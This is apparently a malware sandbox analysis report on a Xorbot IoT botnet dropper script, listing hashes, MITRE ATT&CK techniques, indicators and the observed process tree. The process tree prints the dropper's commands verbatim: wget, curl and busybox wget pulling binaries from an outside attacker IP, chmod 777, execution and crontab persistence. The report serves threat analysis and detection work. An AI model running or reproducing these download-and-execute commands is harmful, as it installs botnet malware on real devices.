xorbot | 6f8f9e04cd9bc383e8a1c96b8b0c648aedc109e7783fb213532c4ce4ff1622e6

Analysis

max time kernel
150s
max time network
111s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30/11/2024, 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ec0ffe14fe481a8c4f08e2dd622a8fb3
SHA1

966e9859553fbe5400c8eba0f02018b78f434149
SHA256

6f8f9e04cd9bc383e8a1c96b8b0c648aedc109e7783fb213532c4ce4ff1622e6
SHA512

73a6817a4345934e3d0ccb4e464d1270255fa4cfc0dd70797f97e0145e2a9b02c2bb68443fd3d29f6caaa50d391ede9391e360bce3990576ce084d9c06ef376a
SSDEEP

96:cNpnbyyvRn3n6epNYYWBl+bTX7WzWHW3WsWEWAeTDHeTDHwWzWHW3WsWEWVQyYnR:cNpnbyyvTRbTX6jjNpnbyyXB

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot
behavioral2/files/fstream-9.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
686	chmod
701	chmod
816	chmod
828	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI	687	4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
/tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb	702	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
/tmp/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv	818	FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
/tmp/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm	829	JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm

Renames itself 1 IoCs

pid	Process
703	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.MDEkou	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/662/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/868/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/905/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/927/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/713/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/727/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/791/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/935/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/11/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/300/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/43/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/663/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/743/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/751/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/817/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/825/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/7/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/261/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/712/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/809/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/915/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/27/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/277/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/792/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/814/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/818/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/855/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/22/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/750/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/769/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/813/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/871/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/402/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/717/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/784/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/728/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/838/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/649/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/831/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/738/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/746/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/752/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/771/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/821/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/953/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/17/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/18/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/884/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/895/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/932/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/936/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/6/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/42/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/716/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/724/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/949/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/732/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/762/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/810/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/875/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/917/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/945/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
File opened for reading	/proc/107/cmdline	7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm	busybox
File opened for modification	/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI	wget
File opened for modification	/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI	curl
File opened for modification	/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI	busybox
File opened for modification	/tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb	wget
File opened for modification	/tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb	curl
File opened for modification	/tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb	busybox
File opened for modification	/tmp/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:654
- /usr/bin/wget
  wget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  - Writes file to tmp directory
  PID:660
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:677
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  - Writes file to tmp directory
  PID:684
- /bin/chmod
  chmod 777 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  ./4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  - Executes dropped EXE
  PID:687
- /bin/rm
  rm 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
  2⤵
  PID:689
- /usr/bin/wget
  wget http://216.126.231.240/bins/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  - Writes file to tmp directory
  PID:690
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  - Writes file to tmp directory
  PID:698
- /bin/chmod
  chmod 777 7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  ./7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:702
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:704
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:706
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:708
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:709
- /bin/rm
  rm 7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
  2⤵
  PID:713
- /usr/bin/wget
  wget http://216.126.231.240/bins/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  PID:716
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  PID:718
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  - Writes file to tmp directory
  PID:808
- /bin/chmod
  chmod 777 FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  ./FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv
  2⤵
  PID:820
- /usr/bin/wget
  wget http://216.126.231.240/bins/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  PID:821
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  PID:823
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  - Writes file to tmp directory
  PID:825
- /bin/chmod
  chmod 777 JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  - File and Directory Permissions Modification
  PID:828
- /tmp/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  ./JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  - Executes dropped EXE
  PID:829
- /bin/rm
  rm JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm
  2⤵
  PID:830
- /usr/bin/wget
  wget http://216.126.231.240/bins/61DFOY4e9MmK7eHuQn5dlnNlrsLhyRwbm9
  2⤵
  PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/FAIH8XzMcszYuRjZlAoOfNh1dt7zZCtQPv

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit
/tmp/JCMMfKTSb7uLzr2apLIdHhz1aUd28CiUYm

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/var/spool/cron/crontabs/tmp.MDEkou

Filesize
210B

MD5
2a73b3d9d1888e4977aaab79915a6098

SHA1
f0fce9989852e5719a205be7e02f46dc5bfbe7ba

SHA256
8355a60e8651f960b20b5b6a6f06c4c73eee5cee9b0648324339e8ce1ff102dc

SHA512
8f036b359034c3b38126e2e9cf7adbaf9cf948c2cf97fa67570ef646e6fdd2d6850731371807d0f0e425c8ea019cb504b4bafba9fb6ef62344eaba25ae99681e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads